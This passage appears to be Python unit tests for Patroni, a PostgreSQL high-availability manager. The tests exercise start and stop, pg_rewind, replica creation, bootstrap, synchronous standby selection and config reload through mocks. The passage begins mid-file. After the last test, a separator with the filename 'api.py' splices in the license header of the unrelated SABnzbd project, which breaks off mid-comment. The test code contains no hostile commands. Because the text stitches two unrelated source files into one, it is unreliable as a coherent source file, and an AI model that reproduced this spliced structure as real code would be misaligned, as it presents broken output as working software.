@patch.object(Postgresql, 'wait_for_port_open')
@patch.object(Postgresql, 'is_running')
def test_start(self, mock_is_running, mock_wait_for_port_open, mock_wait_for_startup, mock_popen):
mock_is_running.return_value = MockPostmaster()
mock_wait_for_port_open.return_value = True
mock_wait_for_startup.return_value = False
mock_popen.return_value.stdout.readline.return_value = '123'
self.assertTrue(self.p.start())
mock_is_running.return_value = None
mock_postmaster = MockPostmaster()
with patch.object(PostmasterProcess, 'start', return_value=mock_postmaster):
pg_conf = os.path.join(self.data_dir, 'postgresql.conf')
open(pg_conf, 'w').close()
self.assertFalse(self.p.start(task=CriticalTask()))
with open(pg_conf) as f:
lines = f.readlines()
self.assertTrue("f.oo = 'bar'\n" in lines)
mock_wait_for_startup.return_value = None
self.assertFalse(self.p.start(10))
self.assertIsNone(self.p.start())
mock_wait_for_port_open.return_value = False
self.assertFalse(self.p.start())
task = CriticalTask()
task.cancel()
self.assertFalse(self.p.start(task=task))
self.p.cancel()
self.assertFalse(self.p.start())
@patch.object(Postgresql, 'pg_isready')
@patch('patroni.postgresql.polling_loop', Mock(return_value=range(1)))
def test_wait_for_port_open(self, mock_pg_isready):
mock_pg_isready.return_value = STATE_NO_RESPONSE
mock_postmaster = MockPostmaster(is_running=False)
# No pid file and postmaster death
self.assertFalse(self.p.wait_for_port_open(mock_postmaster, 1))
mock_postmaster.is_running.return_value = True
# timeout
self.assertFalse(self.p.wait_for_port_open(mock_postmaster, 1))
# pg_isready failure
mock_pg_isready.return_value = 'garbage'
self.assertTrue(self.p.wait_for_port_open(mock_postmaster, 1))
# cancelled
self.p.cancel()
self.assertFalse(self.p.wait_for_port_open(mock_postmaster, 1))
@patch('time.sleep', Mock())
@patch.object(Postgresql, 'is_running')
@patch.object(Postgresql, '_wait_for_connection_close', Mock())
def test_stop(self, mock_is_running):
# Postmaster is not running
mock_callback = Mock()
mock_is_running.return_value = None
self.assertTrue(self.p.stop(on_safepoint=mock_callback))
mock_callback.assert_called()
# Is running, stopped successfully
mock_is_running.return_value = mock_postmaster = MockPostmaster()
mock_callback.reset_mock()
self.assertTrue(self.p.stop(on_safepoint=mock_callback))
mock_callback.assert_called()
mock_postmaster.signal_stop.assert_called()
# Stop signal failed
mock_postmaster.signal_stop.return_value = False
self.assertFalse(self.p.stop())
# Stop signal failed to find process
mock_postmaster.signal_stop.return_value = True
mock_callback.reset_mock()
self.assertTrue(self.p.stop(on_safepoint=mock_callback))
mock_callback.assert_called()
def test_restart(self):
self.p.start = Mock(return_value=False)
self.assertFalse(self.p.restart())
self.assertEqual(self.p.state, 'restart failed (restarting)')
@patch.object(builtins, 'open', MagicMock())
def test_write_pgpass(self):
self.p.write_pgpass({'host': 'localhost', 'port': '5432', 'user': 'foo'})
self.p.write_pgpass({'host': 'localhost', 'port': '5432', 'user': 'foo', 'password': 'bar'})
def test_checkpoint(self):
with patch.object(MockCursor, 'fetchone', Mock(return_value=(True, ))):
self.assertEqual(self.p.checkpoint({'user': 'postgres'}), 'is_in_recovery=true')
with patch.object(MockCursor, 'execute', Mock(return_value=None)):
self.assertIsNone(self.p.checkpoint())
self.assertEqual(self.p.checkpoint(), 'not accessible or not healty')
@patch.object(Postgresql, 'cancellable_subprocess_call')
@patch('patroni.postgresql.Postgresql.write_pgpass', MagicMock(return_value=dict()))
def test_pg_rewind(self, mock_cancellable_subprocess_call):
r = {'user': '', 'host': '', 'port': '', 'database': '', 'password': ''}
mock_cancellable_subprocess_call.return_value = 0
self.assertTrue(self.p.pg_rewind(r))
mock_cancellable_subprocess_call.side_effect = OSError
self.assertFalse(self.p.pg_rewind(r))
def test_check_recovery_conf(self):
self.p.write_recovery_conf({'primary_conninfo': 'foo'})
self.assertFalse(self.p.check_recovery_conf(None))
self.p.write_recovery_conf({})
self.assertTrue(self.p.check_recovery_conf(None))
@patch.object(Postgresql, 'start', Mock())
@patch.object(Postgresql, 'can_rewind', PropertyMock(return_value=True))
def test__get_local_timeline_lsn(self):
self.p.trigger_check_diverged_lsn()
with patch.object(Postgresql, 'controldata',
Mock(return_value={'Database cluster state': 'shut down in recovery',
'Minimum recovery ending location': '0/0',
"Min recovery ending loc's timeline": '0'})):
self.p.rewind_needed_and_possible(self.leader)
with patch.object(Postgresql, 'is_running', Mock(return_value=True)):
with patch.object(MockCursor, 'fetchone', Mock(side_effect=[(False, ), Exception])):
self.p.rewind_needed_and_possible(self.leader)
@patch.object(Postgresql, 'start', Mock())
@patch.object(Postgresql, 'can_rewind', PropertyMock(return_value=True))
@patch.object(Postgresql, '_get_local_timeline_lsn', Mock(return_value=(2, '40159C1')))
@patch.object(Postgresql, 'check_leader_is_not_in_recovery')
def test__check_timeline_and_lsn(self, mock_check_leader_is_not_in_recovery):
mock_check_leader_is_not_in_recovery.return_value = False
self.p.trigger_check_diverged_lsn()
self.assertFalse(self.p.rewind_needed_and_possible(self.leader))
mock_check_leader_is_not_in_recovery.return_value = True
self.assertFalse(self.p.rewind_needed_and_possible(self.leader))
self.p.trigger_check_diverged_lsn()
with patch('psycopg2.connect', Mock(side_effect=Exception)):
self.assertFalse(self.p.rewind_needed_and_possible(self.leader))
self.p.trigger_check_diverged_lsn()
with patch.object(MockCursor, 'fetchone', Mock(side_effect=[('', 2, '0/0'), ('', b'3\t0/40159C0\tn\n')])):
self.assertFalse(self.p.rewind_needed_and_possible(self.leader))
self.p.trigger_check_diverged_lsn()
with patch.object(MockCursor, 'fetchone', Mock(return_value=('', 1, '0/0'))):
with patch.object(Postgresql, '_get_local_timeline_lsn', Mock(return_value=(1, '0/0'))):
self.assertFalse(self.p.rewind_needed_and_possible(self.leader))
self.p.trigger_check_diverged_lsn()
self.assertTrue(self.p.rewind_needed_and_possible(self.leader))
@patch.object(MockCursor, 'fetchone', Mock(side_effect=[(True,), Exception]))
def test_check_leader_is_not_in_recovery(self):
self.p.check_leader_is_not_in_recovery()
self.p.check_leader_is_not_in_recovery()
@patch.object(Postgresql, 'cancellable_subprocess_call', Mock(return_value=0))
@patch.object(Postgresql, 'checkpoint', side_effect=['', '1'])
@patch.object(Postgresql, 'stop', Mock(return_value=False))
@patch.object(Postgresql, 'start', Mock())
def test_rewind(self, mock_checkpoint):
self.p.rewind(self.leader)
with patch.object(Postgresql, 'pg_rewind', Mock(return_value=False)):
mock_checkpoint.side_effect = ['1', '', '', '']
self.p.rewind(self.leader)
self.p.rewind(self.leader)
with patch.object(Postgresql, 'check_leader_is_not_in_recovery', Mock(return_value=False)):
self.p.rewind(self.leader)
self.p.config['remove_data_directory_on_rewind_failure'] = False
self.p.trigger_check_diverged_lsn()
self.p.rewind(self.leader)
with patch.object(Postgresql, 'is_running', Mock(return_value=True)):
self.p.rewind(self.leader)
self.p.is_leader = Mock(return_value=False)
self.p.rewind(self.leader)
@patch.object(Postgresql, 'is_running', Mock(return_value=False))
@patch.object(Postgresql, 'start', Mock())
def test_follow(self):
m = RemoteMember('1', {'restore_command': '2', 'recovery_min_apply_delay': 3, 'archive_cleanup_command': '4'})
self.p.follow(m)
@patch('subprocess.check_output', Mock(return_value=0, side_effect=pg_controldata_string))
def test_can_rewind(self):
with patch('subprocess.call', MagicMock(return_value=1)):
self.assertFalse(self.p.can_rewind)
with patch('subprocess.call', side_effect=OSError):
self.assertFalse(self.p.can_rewind)
with patch.object(Postgresql, 'controldata', Mock(return_value={'wal_log_hints setting': 'on'})):
self.assertTrue(self.p.can_rewind)
self.p.config['use_pg_rewind'] = False
self.assertFalse(self.p.can_rewind)
@patch('time.sleep', Mock())
@patch.object(Postgresql, 'cancellable_subprocess_call')
@patch.object(Postgresql, 'remove_data_directory', Mock(return_value=True))
def test_create_replica(self, mock_cancellable_subprocess_call):
self.p.delete_trigger_file = Mock(side_effect=OSError)
self.p.config['create_replica_methods'] = ['pgBackRest']
self.p.config['pgBackRest'] = {'command': 'pgBackRest', 'keep_data': True, 'no_params': True}
mock_cancellable_subprocess_call.return_value = 0
self.assertEqual(self.p.create_replica(self.leader), 0)
self.p.config['create_replica_methods'] = ['wale', 'basebackup']
self.p.config['wale'] = {'command': 'foo'}
self.assertEqual(self.p.create_replica(self.leader), 0)
del self.p.config['wale']
self.assertEqual(self.p.create_replica(self.leader), 0)
self.p.config['create_replica_methods'] = ['basebackup']
self.p.config['basebackup'] = [{'max_rate': '100M'}, 'no-sync']
self.assertEqual(self.p.create_replica(self.leader), 0)
self.p.config['basebackup'] = [{'max_rate': '100M', 'compress': '9'}]
with mock.patch('patroni.postgresql.logger.error', new_callable=Mock()) as mock_logger:
self.p.create_replica(self.leader)
mock_logger.assert_called_once()
self.assertTrue("only one key-value is allowed and value should be a string" in mock_logger.call_args[0][0],
"not matching {0}".format(mock_logger.call_args[0][0]))
self.p.config['basebackup'] = [42]
with mock.patch('patroni.postgresql.logger.error', new_callable=Mock()) as mock_logger:
self.p.create_replica(self.leader)
mock_logger.assert_called_once()
self.assertTrue("value should be string value or a single key-value pair" in mock_logger.call_args[0][0],
"not matching {0}".format(mock_logger.call_args[0][0]))
self.p.config['basebackup'] = {"foo": "bar"}
self.assertEqual(self.p.create_replica(self.leader), 0)
self.p.config['create_replica_methods'] = ['wale', 'basebackup']
del self.p.config['basebackup']
mock_cancellable_subprocess_call.return_value = 1
self.assertEqual(self.p.create_replica(self.leader), 1)
mock_cancellable_subprocess_call.side_effect = Exception('foo')
self.assertEqual(self.p.create_replica(self.leader), 1)
mock_cancellable_subprocess_call.side_effect = [1, 0]
self.assertEqual(self.p.create_replica(self.leader), 0)
mock_cancellable_subprocess_call.side_effect = [Exception(), 0]
self.assertEqual(self.p.create_replica(self.leader), 0)
self.p.cancel()
self.assertEqual(self.p.create_replica(self.leader), 1)
@patch('time.sleep', Mock())
@patch.object(Postgresql, 'cancellable_subprocess_call')
@patch.object(Postgresql, 'remove_data_directory', Mock(return_value=True))
def test_create_replica_old_format(self, mock_cancellable_subprocess_call):
""" The same test as before but with old 'create_replica_method'
to test backward compatibility
"""
self.p.delete_trigger_file = Mock(side_effect=OSError)
self.p.config['create_replica_method'] = ['wale', 'basebackup']
self.p.config['wale'] = {'command': 'foo'}
mock_cancellable_subprocess_call.return_value = 0
self.assertEqual(self.p.create_replica(self.leader), 0)
del self.p.config['wale']
self.assertEqual(self.p.create_replica(self.leader), 0)
self.p.config['create_replica_method'] = ['basebackup']
self.p.config['basebackup'] = [{'max_rate': '100M'}, 'no-sync']
self.assertEqual(self.p.create_replica(self.leader), 0)
self.p.config['create_replica_method'] = ['wale', 'basebackup']
del self.p.config['basebackup']
mock_cancellable_subprocess_call.return_value = 1
self.assertEqual(self.p.create_replica(self.leader), 1)
def test_basebackup(self):
self.p.cancel()
self.p.basebackup(None, None, {'foo': 'bar'})
@patch.object(Postgresql, 'is_running', Mock(return_value=True))
def test_sync_replication_slots(self):
self.p.start()
config = ClusterConfig(1, {'slots': {'ls': {'database': 'a', 'plugin': 'b'},
'A': 0, 'test_3': 0, 'b': {'type': 'logical', 'plugin': '1'}}}, 1)
cluster = Cluster(True, config, self.leader, 0, [self.me, self.other, self.leadermem], None, None, None)
with mock.patch('patroni.postgresql.Postgresql._query', Mock(side_effect=psycopg2.OperationalError)):
self.p.sync_replication_slots(cluster)
self.p.sync_replication_slots(cluster)
with mock.patch('patroni.postgresql.Postgresql.role', new_callable=PropertyMock(return_value='replica')):
self.p.sync_replication_slots(cluster)
with patch.object(Postgresql, 'drop_replication_slot', Mock(return_value=True)),\
patch('patroni.dcs.logger.error', new_callable=Mock()) as errorlog_mock:
self.p.query = Mock()
alias1 = Member(0, 'test-3', 28, {'conn_url': 'postgres://replicator:rep-pass@127.0.0.1:5436/postgres'})
alias2 = Member(0, 'test.3', 28, {'conn_url': 'postgres://replicator:rep-pass@127.0.0.1:5436/postgres'})
cluster.members.extend([alias1, alias2])
self.p.sync_replication_slots(cluster)
self.assertEqual(errorlog_mock.call_count, 5)
ca = errorlog_mock.call_args_list[0][0][1]
self.assertTrue("test-3" in ca, "non matching {0}".format(ca))
self.assertTrue("test.3" in ca, "non matching {0}".format(ca))
@patch.object(MockCursor, 'execute', Mock(side_effect=psycopg2.OperationalError))
def test__query(self):
self.assertRaises(PostgresConnectionException, self.p._query, 'blabla')
self.p._state = 'restarting'
self.assertRaises(RetryFailedError, self.p._query, 'blabla')
def test_query(self):
self.p.query('select 1')
self.assertRaises(PostgresConnectionException, self.p.query, 'RetryFailedError')
self.assertRaises(psycopg2.ProgrammingError, self.p.query, 'blabla')
@patch.object(Postgresql, 'pg_isready', Mock(return_value=STATE_REJECT))
def test_is_leader(self):
self.assertTrue(self.p.is_leader())
self.p.reset_cluster_info_state()
with patch.object(Postgresql, '_query', Mock(side_effect=RetryFailedError(''))):
self.assertRaises(PostgresConnectionException, self.p.is_leader)
def test_reload(self):
self.assertTrue(self.p.reload())
@patch.object(Postgresql, 'is_running')
def test_is_healthy(self, mock_is_running):
mock_is_running.return_value = True
self.assertTrue(self.p.is_healthy())
mock_is_running.return_value = False
self.assertFalse(self.p.is_healthy())
def test_promote(self):
self.p.set_role('replica')
self.assertIsNone(self.p.promote(0))
self.assertTrue(self.p.promote(0))
def test_timeline_wal_position(self):
self.assertEqual(self.p.timeline_wal_position(), (1, 2))
Thread(target=self.p.timeline_wal_position).start()
@patch.object(PostmasterProcess, 'from_pidfile')
def test_is_running(self, mock_frompidfile):
# Cached postmaster running
mock_postmaster = self.p._postmaster_proc = MockPostmaster()
self.assertEqual(self.p.is_running(), mock_postmaster)
# Cached postmaster not running, no postmaster running
mock_postmaster.is_running.return_value = False
mock_frompidfile.return_value = None
self.assertEqual(self.p.is_running(), None)
self.assertEqual(self.p._postmaster_proc, None)
# No cached postmaster, postmaster running
mock_frompidfile.return_value = mock_postmaster2 = MockPostmaster()
self.assertEqual(self.p.is_running(), mock_postmaster2)
self.assertEqual(self.p._postmaster_proc, mock_postmaster2)
@patch('shlex.split', Mock(side_effect=OSError))
def test_call_nowait(self):
self.p.set_role('replica')
self.assertIsNone(self.p.call_nowait('on_start'))
self.p.bootstrapping = True
self.assertIsNone(self.p.call_nowait('on_start'))
def test_non_existing_callback(self):
self.assertFalse(self.p.call_nowait('foobar'))
@patch.object(Postgresql, 'is_running', Mock(return_value=MockPostmaster()))
def test_is_leader_exception(self):
self.p.start()
self.p.query = Mock(side_effect=psycopg2.OperationalError("not supported"))
self.assertTrue(self.p.stop())
@patch('os.rename', Mock())
@patch('os.path.isdir', Mock(return_value=True))
def test_move_data_directory(self):
self.p.move_data_directory()
with patch('os.rename', Mock(side_effect=OSError)):
self.p.move_data_directory()
@patch.object(Postgresql, 'is_running', Mock(return_value=True))
def test_bootstrap(self):
with patch('subprocess.call', Mock(return_value=1)):
self.assertFalse(self.p.bootstrap({}))
config = {'users': {'replicator': {'password': 'rep-pass', 'options': ['replication']}}}
self.p.bootstrap(config)
with open(os.path.join(self.config_dir, 'pg_hba.conf')) as f:
lines = f.readlines()
self.assertTrue('host all all 0.0.0.0/0 md5\n' in lines)
self.p.config.pop('pg_hba')
config.update({'post_init': '/bin/false',
'pg_hba': ['host replication replicator 127.0.0.1/32 md5',
'hostssl all all 0.0.0.0/0 md5',
'host all all 0.0.0.0/0 md5']})
self.p.bootstrap(config)
with open(os.path.join(self.data_dir, 'pg_hba.conf')) as f:
lines = f.readlines()
self.assertTrue('host replication replicator 127.0.0.1/32 md5\n' in lines)
@patch.object(Postgresql, 'cancellable_subprocess_call')
def test_custom_bootstrap(self, mock_cancellable_subprocess_call):
self.p.config.pop('pg_hba')
config = {'method': 'foo', 'foo': {'command': 'bar'}}
mock_cancellable_subprocess_call.return_value = 1
self.assertFalse(self.p.bootstrap(config))
mock_cancellable_subprocess_call.return_value = 0
with patch('subprocess.Popen', Mock(side_effect=Exception("42"))),\
patch('os.path.isfile', Mock(return_value=True)),\
patch('os.unlink', Mock()),\
patch.object(Postgresql, 'save_configuration_files', Mock()),\
patch.object(Postgresql, 'restore_configuration_files', Mock()),\
patch.object(Postgresql, 'write_recovery_conf', Mock()):
with self.assertRaises(Exception) as e:
self.p.bootstrap(config)
self.assertEqual(str(e.exception), '42')
config['foo']['recovery_conf'] = {'foo': 'bar'}
with self.assertRaises(Exception) as e:
self.p.bootstrap(config)
self.assertEqual(str(e.exception), '42')
mock_cancellable_subprocess_call.side_effect = Exception
self.assertFalse(self.p.bootstrap(config))
@patch('time.sleep', Mock())
@patch('os.unlink', Mock())
@patch('os.path.isfile', Mock(return_value=True))
@patch.object(Postgresql, 'run_bootstrap_post_init', Mock(return_value=True))
@patch.object(Postgresql, '_custom_bootstrap', Mock(return_value=True))
@patch.object(Postgresql, 'start', Mock(return_value=True))
def test_post_bootstrap(self):
config = {'method': 'foo', 'foo': {'command': 'bar'}}
self.p.bootstrap(config)
task = CriticalTask()
with patch.object(Postgresql, 'create_or_update_role', Mock(side_effect=Exception)):
self.p.post_bootstrap({}, task)
self.assertFalse(task.result)
self.p.config.pop('pg_hba')
self.p.post_bootstrap({}, task)
self.assertTrue(task.result)
self.p.bootstrap(config)
with patch.object(Postgresql, 'pending_restart', PropertyMock(return_value=True)), \
patch.object(Postgresql, 'restart', Mock()) as mock_restart:
self.p.post_bootstrap({}, task)
mock_restart.assert_called_once()
self.p.bootstrap(config)
self.p.set_state('stopped')
self.p.reload_config({'authentication': {'superuser': {'username': 'p', 'password': 'p'},
'replication': {'username': 'r', 'password': 'r'}},
'listen': '*', 'retry_timeout': 10, 'parameters': {'hba_file': 'foo'}})
with patch.object(Postgresql, 'restart', Mock()) as mock_restart:
self.p.post_bootstrap({}, task)
mock_restart.assert_called_once()
@patch.object(Postgresql, 'cancellable_subprocess_call')
def test_run_bootstrap_post_init(self, mock_cancellable_subprocess_call):
mock_cancellable_subprocess_call.return_value = 1
self.assertFalse(self.p.run_bootstrap_post_init({'post_init': '/bin/false'}))
mock_cancellable_subprocess_call.return_value = 0
self.p._superuser.pop('username')
self.assertTrue(self.p.run_bootstrap_post_init({'post_init': '/bin/false'}))
mock_cancellable_subprocess_call.assert_called()
args, kwargs = mock_cancellable_subprocess_call.call_args
self.assertTrue('PGPASSFILE' in kwargs['env'])
self.assertEqual(args[0], ['/bin/false', 'postgres://127.0.0.2:5432/postgres'])
mock_cancellable_subprocess_call.reset_mock()
self.p._local_address.pop('host')
self.assertTrue(self.p.run_bootstrap_post_init({'post_init': '/bin/false'}))
mock_cancellable_subprocess_call.assert_called()
self.assertEqual(mock_cancellable_subprocess_call.call_args[0][0], ['/bin/false', 'postgres://:5432/postgres'])
mock_cancellable_subprocess_call.side_effect = OSError
self.assertFalse(self.p.run_bootstrap_post_init({'post_init': '/bin/false'}))
@patch('patroni.postgresql.Postgresql.create_replica', Mock(return_value=0))
def test_clone(self):
self.p.clone(self.leader)
@patch('os.listdir', Mock(return_value=['recovery.conf']))
@patch('os.path.exists', Mock(return_value=True))
def test_get_postgres_role_from_data_directory(self):
self.assertEqual(self.p.get_postgres_role_from_data_directory(), 'replica')
def test_remove_data_directory(self):
self.p.remove_data_directory()
open(self.data_dir, 'w').close()
self.p.remove_data_directory()
os.symlink('unexisting', self.data_dir)
with patch('os.unlink', Mock(side_effect=OSError)):
self.p.remove_data_directory()
self.p.remove_data_directory()
@patch('patroni.postgresql.Postgresql._version_file_exists', Mock(return_value=True))
def test_controldata(self):
with patch('subprocess.check_output', Mock(return_value=0, side_effect=pg_controldata_string)):
data = self.p.controldata()
self.assertEqual(len(data), 50)
self.assertEqual(data['Database cluster state'], 'shut down in recovery')
self.assertEqual(data['wal_log_hints setting'], 'on')
self.assertEqual(int(data['Database block size']), 8192)
with patch('subprocess.check_output', Mock(side_effect=subprocess.CalledProcessError(1, ''))):
self.assertEqual(self.p.controldata(), {})
@patch('patroni.postgresql.Postgresql._version_file_exists', Mock(return_value=True))
@patch('subprocess.check_output', MagicMock(return_value=0, side_effect=pg_controldata_string))
def test_sysid(self):
self.assertEqual(self.p.sysid, "6200971513092291716")
@patch('os.path.isfile', Mock(return_value=True))
@patch('shutil.copy', Mock(side_effect=IOError))
def test_save_configuration_files(self):
self.p.save_configuration_files()
@patch('os.path.isfile', Mock(side_effect=[False, True]))
@patch('shutil.copy', Mock(side_effect=IOError))
def test_restore_configuration_files(self):
self.p.restore_configuration_files()
def test_can_create_replica_without_replication_connection(self):
self.p.config['create_replica_method'] = []
self.assertFalse(self.p.can_create_replica_without_replication_connection())
self.p.config['create_replica_method'] = ['wale', 'basebackup']
self.p.config['wale'] = {'command': 'foo', 'no_master': 1}
self.assertTrue(self.p.can_create_replica_without_replication_connection())
def test_replica_method_can_work_without_replication_connection(self):
self.assertFalse(self.p.replica_method_can_work_without_replication_connection('basebackup'))
self.assertFalse(self.p.replica_method_can_work_without_replication_connection('foobar'))
self.p.config['foo'] = {'command': 'bar', 'no_master': 1}
self.assertTrue(self.p.replica_method_can_work_without_replication_connection('foo'))
self.p.config['foo'] = {'command': 'bar'}
self.assertFalse(self.p.replica_method_can_work_without_replication_connection('foo'))
@patch.object(Postgresql, 'is_running', Mock(return_value=True))
def test_reload_config(self):
parameters = self._PARAMETERS.copy()
parameters.pop('f.oo')
config = {'pg_hba': [''], 'use_unix_socket': True, 'authentication': {},
'retry_timeout': 10, 'listen': '*', 'parameters': parameters}
self.p.reload_config(config)
parameters['b.ar'] = 'bar'
self.p.reload_config(config)
parameters['autovacuum'] = 'on'
self.p.reload_config(config)
parameters['autovacuum'] = 'off'
parameters.pop('search_path')
config['listen'] = '*:5433'
self.p.reload_config(config)
parameters['unix_socket_directories'] = '.'
self.p.reload_config(config)
self.p.resolve_connection_addresses()
@patch.object(Postgresql, '_version_file_exists', Mock(return_value=True))
def test_get_major_version(self):
with patch.object(builtins, 'open', mock_open(read_data='9.4')):
self.assertEqual(self.p.get_major_version(), 90400)
with patch.object(builtins, 'open', Mock(side_effect=Exception)):
self.assertEqual(self.p.get_major_version(), 0)
def test_postmaster_start_time(self):
with patch.object(MockCursor, "fetchone", Mock(return_value=('foo', True, '', '', '', '', False))):
self.assertEqual(self.p.postmaster_start_time(), 'foo')
with patch.object(MockCursor, "execute", side_effect=psycopg2.Error):
self.assertIsNone(self.p.postmaster_start_time())
def test_check_for_startup(self):
with patch('subprocess.call', return_value=0):
self.p._state = 'starting'
self.assertFalse(self.p.check_for_startup())
self.assertEqual(self.p.state, 'running')
with patch('subprocess.call', return_value=1):
self.p._state = 'starting'
self.assertTrue(self.p.check_for_startup())
self.assertEqual(self.p.state, 'starting')
with patch('subprocess.call', return_value=2):
self.p._state = 'starting'
self.assertFalse(self.p.check_for_startup())
self.assertEqual(self.p.state, 'start failed')
with patch('subprocess.call', return_value=0):
self.p._state = 'running'
self.assertFalse(self.p.check_for_startup())
self.assertEqual(self.p.state, 'running')
with patch('subprocess.call', return_value=127):
self.p._state = 'running'
self.assertFalse(self.p.check_for_startup())
self.assertEqual(self.p.state, 'running')
self.p._state = 'starting'
self.assertFalse(self.p.check_for_startup())
self.assertEqual(self.p.state, 'running')
def test_wait_for_startup(self):
state = {'sleeps': 0, 'num_rejects': 0, 'final_return': 0}
self.__thread_ident = current_thread().ident
def increment_sleeps(*args):
if current_thread().ident == self.__thread_ident:
print("Sleep")
state['sleeps'] += 1
def isready_return(*args):
ret = 1 if state['sleeps'] < state['num_rejects'] else state['final_return']
print("Isready {0} {1}".format(ret, state))
return ret
def time_in_state(*args):
return state['sleeps']
with patch('subprocess.call', side_effect=isready_return):
with patch('time.sleep', side_effect=increment_sleeps):
self.p.time_in_state = Mock(side_effect=time_in_state)
self.p._state = 'stopped'
self.assertTrue(self.p.wait_for_startup())
self.assertEqual(state['sleeps'], 0)
self.p._state = 'starting'
state['num_rejects'] = 5
self.assertTrue(self.p.wait_for_startup())
self.assertEqual(state['sleeps'], 5)
self.p._state = 'starting'
state['sleeps'] = 0
state['final_return'] = 2
self.assertFalse(self.p.wait_for_startup())
self.p._state = 'starting'
state['sleeps'] = 0
state['final_return'] = 0
self.assertFalse(self.p.wait_for_startup(timeout=2))
self.assertEqual(state['sleeps'], 3)
with patch.object(Postgresql, 'check_startup_state_changed', Mock(return_value=False)):
self.p.cancel()
self.p._state = 'starting'
self.assertIsNone(self.p.wait_for_startup())
def test_pick_sync_standby(self):
cluster = Cluster(True, None, self.leader, 0, [self.me, self.other, self.leadermem], None,
SyncState(0, self.me.name, self.leadermem.name), None)
with patch.object(Postgresql, "query", return_value=[
(self.leadermem.name, 'streaming', 'sync'),
(self.me.name, 'streaming', 'async'),
(self.other.name, 'streaming', 'async'),
]):
self.assertEqual(self.p.pick_synchronous_standby(cluster), (self.leadermem.name, True))
with patch.object(Postgresql, "query", return_value=[
(self.me.name, 'streaming', 'async'),
(self.leadermem.name, 'streaming', 'potential'),
(self.other.name, 'streaming', 'async'),
]):
self.assertEqual(self.p.pick_synchronous_standby(cluster), (self.leadermem.name, False))
with patch.object(Postgresql, "query", return_value=[
(self.me.name, 'streaming', 'async'),
(self.other.name, 'streaming', 'async'),
]):
self.assertEqual(self.p.pick_synchronous_standby(cluster), (self.me.name, False))
with patch.object(Postgresql, "query", return_value=[
('missing', 'streaming', 'sync'),
(self.me.name, 'streaming', 'async'),
(self.other.name, 'streaming', 'async'),
]):
self.assertEqual(self.p.pick_synchronous_standby(cluster), (self.me.name, False))
with patch.object(Postgresql, "query", return_value=[]):
self.assertEqual(self.p.pick_synchronous_standby(cluster), (None, False))
def test_set_sync_standby(self):
def value_in_conf():
with open(os.path.join(self.data_dir, 'postgresql.conf')) as f:
for line in f:
if line.startswith('synchronous_standby_names'):
return line.strip()
mock_reload = self.p.reload = Mock()
self.p.set_synchronous_standby('n1')
self.assertEqual(value_in_conf(), "synchronous_standby_names = 'n1'")
mock_reload.assert_called()
mock_reload.reset_mock()
self.p.set_synchronous_standby('n1')
mock_reload.assert_not_called()
self.assertEqual(value_in_conf(), "synchronous_standby_names = 'n1'")
self.p.set_synchronous_standby('n2')
mock_reload.assert_called()
self.assertEqual(value_in_conf(), "synchronous_standby_names = 'n2'")
mock_reload.reset_mock()
self.p.set_synchronous_standby(None)
mock_reload.assert_called()
self.assertEqual(value_in_conf(), None)
def test_get_server_parameters(self):
config = {'synchronous_mode': True, 'parameters': {'wal_level': 'hot_standby'}, 'listen': '0'}
self.p.get_server_parameters(config)
config['synchronous_mode_strict'] = True
self.p.get_server_parameters(config)
self.p.set_synchronous_standby('foo')
self.p.get_server_parameters(config)
@patch('time.sleep', Mock())
def test__wait_for_connection_close(self):
mock_postmaster = MockPostmaster()
with patch.object(Postgresql, 'is_running', Mock(return_value=mock_postmaster)):
mock_postmaster.is_running.side_effect = [True, False, False]
mock_callback = Mock()
self.p.stop(on_safepoint=mock_callback)
mock_postmaster.is_running.side_effect = [True, False, False]
with patch.object(MockCursor, "execute", Mock(side_effect=psycopg2.Error)):
self.p.stop(on_safepoint=mock_callback)
def test_terminate_starting_postmaster(self):
mock_postmaster = MockPostmaster()
self.p.terminate_starting_postmaster(mock_postmaster)
mock_postmaster.signal_stop.assert_called()
mock_postmaster.wait.assert_called()
def test_read_postmaster_opts(self):
m = mock_open(read_data='/usr/lib/postgres/9.6/bin/postgres "-D" "data/postgresql0" \
"--listen_addresses=127.0.0.1" "--port=5432" "--hot_standby=on" "--wal_level=hot_standby" \
"--wal_log_hints=on" "--max_wal_senders=5" "--max_replication_slots=5"\n')
with patch.object(builtins, 'open', m):
data = self.p.read_postmaster_opts()
self.assertEqual(data['wal_level'], 'hot_standby')
self.assertEqual(int(data['max_replication_slots']), 5)
self.assertEqual(data.get('D'), None)
m.side_effect = IOError
data = self.p.read_postmaster_opts()
self.assertEqual(data, dict())
@patch('subprocess.Popen')
def test_single_user_mode(self, subprocess_popen_mock):
subprocess_popen_mock.return_value.wait.return_value = 0
self.assertEqual(self.p.single_user_mode('CHECKPOINT', {'archive_mode': 'on'}), 0)
@patch('os.listdir', Mock(side_effect=[OSError, ['a', 'b']]))
@patch('os.unlink', Mock(side_effect=OSError))
@patch('os.remove', Mock())
@patch('os.path.islink', Mock(side_effect=[True, False]))
@patch('os.path.isfile', Mock(return_value=True))
def test_cleanup_archive_status(self):
self.p.cleanup_archive_status()
self.p.cleanup_archive_status()
@patch('os.unlink', Mock())
@patch('os.path.isfile', Mock(return_value=True))
@patch.object(Postgresql, 'single_user_mode', Mock(return_value=0))
def test_fix_cluster_state(self):
self.assertTrue(self.p.fix_cluster_state())
def test_replica_cached_timeline(self):
self.assertEqual(self.p.replica_cached_timeline(1), 2)
def test_get_master_timeline(self):
self.assertEqual(self.p.get_master_timeline(), 1)
def test_cancellable_subprocess_call(self):
self.p.cancel()
self.assertRaises(PostgresException, self.p.cancellable_subprocess_call, communicate_input=None)
@patch('patroni.postgresql.polling_loop', Mock(return_value=[0, 0]))
def test_cancel(self):
self.p._cancellable = Mock()
self.p._cancellable.returncode = None
self.p.cancel()
type(self.p._cancellable).returncode = PropertyMock(side_effect=[None, -15])
self.p.cancel()
@patch.object(Postgresql, 'get_postgres_role_from_data_directory', Mock(return_value='replica'))
def test__build_effective_configuration(self):
with patch.object(Postgresql, 'controldata',
Mock(return_value={'max_connections setting': '200',
'max_worker_processes setting': '20',
'max_prepared_xacts setting': '100',
'max_locks_per_xact setting': '100'})):
self.p.cancel()
self.assertFalse(self.p.start())
self.assertTrue(self.p.pending_restart)
|
api.py
|
#!/usr/bin/python3 -OO
# Copyright 2007-2020 The SABnzbd-Team <team@sabnzbd.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
